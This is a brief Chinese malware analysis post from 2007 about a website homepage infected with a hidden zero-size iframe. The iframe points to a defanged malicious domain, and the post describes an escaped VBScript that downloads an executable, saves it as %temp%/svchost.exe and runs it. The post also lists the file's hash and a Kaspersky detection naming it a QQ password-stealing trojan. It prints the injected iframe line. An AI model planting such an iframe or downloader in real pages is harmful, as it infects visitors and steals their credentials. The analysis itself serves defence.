endurer 原创2007-02-05 第1版
网站首页被加入代码:/------<iframe height=0 width=0 src="hxxp://www.g**ao**jun***888.com/4"></iframe>------/
打开网页4 中包含Javascript代码,输出一段加入多余空格、使用escape()加密的VBScript脚本程序。该VBScript脚本程序利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件txet.exe,保存为 %temp%/svchost.exe,然后调用自定义函数yunxingexe(m5,X skj9)。自定义函数yunxingexe()创建Shell.Application 对象XsKje,利用 XsKje 的 ShellExecute 方法 来运行 %temp%/svchost.exe。
/------文件说明符 : D:/test/txet.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-2-1 17:3:19修改时间 : 2007-2-1 17:3:25访问时间 : 2007-2-1 17:4:30大小 : 62976 字节 61.512 KBMD5 : 0d080a3e2205940a128ceb5df05db0b5------/
Kapserky报为:Trojan-PSW.Win32.QQRob.iy
